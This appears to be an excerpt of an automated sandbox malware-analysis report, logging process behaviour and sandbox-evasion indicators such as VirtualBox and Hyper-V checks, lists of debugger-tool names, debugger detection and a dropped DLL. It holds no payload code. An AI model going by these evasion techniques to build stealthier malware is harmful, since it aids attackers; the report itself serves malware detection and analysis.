                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe  Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match  File source: Process Memory Space: RegSvcs.exe PID: 1756, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\svchost.exe  Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Windows\SysWOW64\svchost.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity
                      Source: C:\Windows\SysWOW64\svchost.exe  System information queried: FirmwareTableInformation
                      Source: C:\Windows\SysWOW64\svchost.exe  API/Special instruction interceptor: Address: 7FFBA88CCE64
                      Source: C:\Windows\SysWOW64\svchost.exe  API/Special instruction interceptor: Address: 54BB83A
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: HOOKEXPLORER.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: OLLYDBG.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: EXEAUTORUNS.EXEDUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDNSPY.EXEPETOOLS.EXEAUTORUNSC.EX
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: X64DBG.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: AUTORUNS.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: PETOOLS.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: WINDUMP.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: DUMPCAP.EXE
                      Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: DDLER.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEP
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe  Memory allocated: 2E20000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe  Memory allocated: 4E20000 memory commit | memory reserve | memory write watch
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: VBoxGuest
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: C:\Windows\SysWOW64\vboxservice.exe
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: C:\Windows\SysWOW64\vboxtray.exe
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: VBoxTrayIPC
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sys
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: C:\Windows\SysWOW64\vboxhook.dll
                      Source: C:\Windows\SysWOW64\svchost.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDate
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: \pipe\VBoxTrayIPC
                      Source: C:\Windows\SysWOW64\svchost.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sys
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: VBoxMiniRdrDN
                      Source: C:\Windows\SysWOW64\svchost.exe  File opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys
                      Source: C:\Windows\SysWOW64\svchost.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Windows\System32\svchost.exe  Code function: 27_2_00007DF4587B4248 sldt word ptr [eax]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe  Window found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 9808
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 9861
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 9887
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 9879
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe  Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Avlogo\goopdate.dll
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe  API coverage: 5.7 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8972  Thread sleep count: 9861 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5284  Thread sleep count: 9887 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6236  Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724  Thread sleep count: 9879 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF4586D1618 calloc,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,27_2_00007DF4586D1618
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FEC126 FindFirstFileExW,52_2_00FEC126
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B926118 FindFirstFileW,FindClose,FindNextFileW,52_2_6B926118
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F7A07 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,52_2_6B8F7A07
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F78C0 FindFirstFileW,GetLastError,DeleteFileW,FindNextFileW,GetLastError,FindClose,52_2_6B8F78C0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9392EE FindFirstFileW,GetLastError,PathStripPathW,PathStripPathW,PathStripPathW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,FindNextFileW,GetLastError,FindClose,52_2_6B9392EE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F7789 FindFirstFileW,FindNextFileW,GetLastError,FindClose,52_2_6B8F7789
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8FD6DE FindFirstFileW,FindNextFileW,FindClose,52_2_6B8FD6DE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B8F9507 FindFirstFileW,FindNextFileW,FindClose,52_2_6B8F9507
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B91944D FindFirstFileW,FindNextFileW,FindClose,52_2_6B91944D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B778D9 GetLogicalDriveStringsW,QueryDosDeviceW,7_2_05B778D9
                      Source: C:\Windows\System32\svchost.exeCode function: 27_2_00007DF45873DA34 GetSystemInfo,27_2_00007DF45873DA34
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local
                      Source: RegSvcs.exe, 00000008.00000002.289418154368.0000000005750000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: T\0vmCI
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: svchost.exe, 00000013.00000002.289527710961.0000000002ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: stringOverrideDeviceIdHyper-V RAWWin32API|System Information Structures|SYSTEM_INFO|dwNumberOfProcessorsCIM_KeyErrorCleared
                      Source: svchost.exe, 00000013.00000003.289444664990.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000003.289447615219.0000000002ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: svchost.exe, 00000013.00000003.289446657474.0000000002C13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: svchost.exe, 00000013.00000002.289527263474.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289984818568.0000018CD2A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000001B.00000002.289984818568.0000018CD2A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@0
                      Source: svchost.exe, 0000001B.00000002.289984895526.0000018CD2A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP UDPv6 Service Provider
                      Source: svchost.exe, 00000013.00000002.289527354426.0000000002E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                      Source: svchost.exe, 00000013.00000003.289416235563.0000000005420000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: powershell.exe, 0000001F.00000002.289731324970.000002AA54036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
                      Source: svchost.exe, 00000013.00000002.289527354426.0000000002E24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\wbem\fastprox.dllC:\Windows\system32\wbem\fastprox.dlllC:\Windows\system32\wbem\fastprox.dlllHMicrosoft-Windows-Hyper-V-HypervisorFApplication Management Group Policy
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: svchost.exe, 00000013.00000002.289527753008.0000000002EE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >Microsoft-Windows-DHCPv6-Client@Microsoft-Windows-WMPNSS-ServiceHMicrosoft-Windows-Devices-Background@Microsoft-Windows-DiskDiagnosticJMicrosoft-Windows-Fault-Tolerant-HeapJMicrosoft-Windows-GPIO-ClassExtensionHMicrosoft-Antimalware-ShieldProvider@Microsoft-Windows-DistributedCOM@Microsoft-Windows-EventCollector>Microsoft-Windows-FilterManagerHMicrosoft-Windows-Hyper-V-HypervisorDMicrosoft-Windows-IsolatedUserModeBMicrosoft-Windows-WLAN-AutoConfigFApplication Management Group Policy>Microsoft-Windows-BitLocker-APIDMicrosoft-Windows-BitLocker-Driver<Microsoft-Windows-Kernel-Power@Microsoft-Windows-Kernel-General>Microsoft-Windows-NetworkBridge>Microsoft-Windows-OverlayFilterJMicrosoft-Windows-Power-Meter-PollingJMicrosoft-Windows-ResourcePublicationHMicrosoft-Windows-SPB-ClassExtension@Microsoft-Windows-Spell-Checking>Microsoft-Windows-StartupRepair>Microsoft-Windows-TaskScheduler<Microsoft-Windows-Time-ServiceFMicrosoft-Windows-LanguagePackSetup<Microsoft-Windows-SpellChecker>Microsoft-Windows-SetupPlatform>Microsoft-Windows-USB-MAUSBHOST<Microsoft-Windows-OfflineFilesJMicrosoft-Windows-WindowsUpdateClientBMicrosoft-Windows-WLAN-AutoConfig
                      Source: mshta.exe, 00000015.00000002.289446850624.000002A6C1A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000015.00000003.289435758165.000002A6C1A9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.289549409554.0000022B57145000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000003.289582823676.000002034DBFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000002.289588567207.000002034DBFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000003.289581825618.000002034DBFD000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289665472125.0000013C0E71F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exeCode function: 34_2_00007FF652A75BD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,34_2_00007FF652A75BD8
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA0447A CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,52_2_6BA0447A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031D1277 mov eax, dword ptr fs:[00000030h]7_2_031D1277
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B787FF mov eax, dword ptr fs:[00000030h]7_2_05B787FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B78BD0 mov eax, dword ptr fs:[00000030h]7_2_05B78BD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_05B7B22E mov eax, dword ptr fs:[00000030h]7_2_05B7B22E
                      Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_3_00770283 mov eax, dword ptr fs:[00000030h]19_3_00770283
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exeCode function: 20_3_02770283 mov eax, dword ptr fs:[00000030h]20_3_02770283
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FEBE58 mov eax, dword ptr fs:[00000030h]52_2_00FEBE58
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FEA765 mov eax, dword ptr fs:[00000030h]52_2_00FEA765
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA26064 mov eax, dword ptr fs:[00000030h]52_2_6BA26064
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA3B4BF mov esi, dword ptr fs:[00000030h]52_2_6BA3B4BF
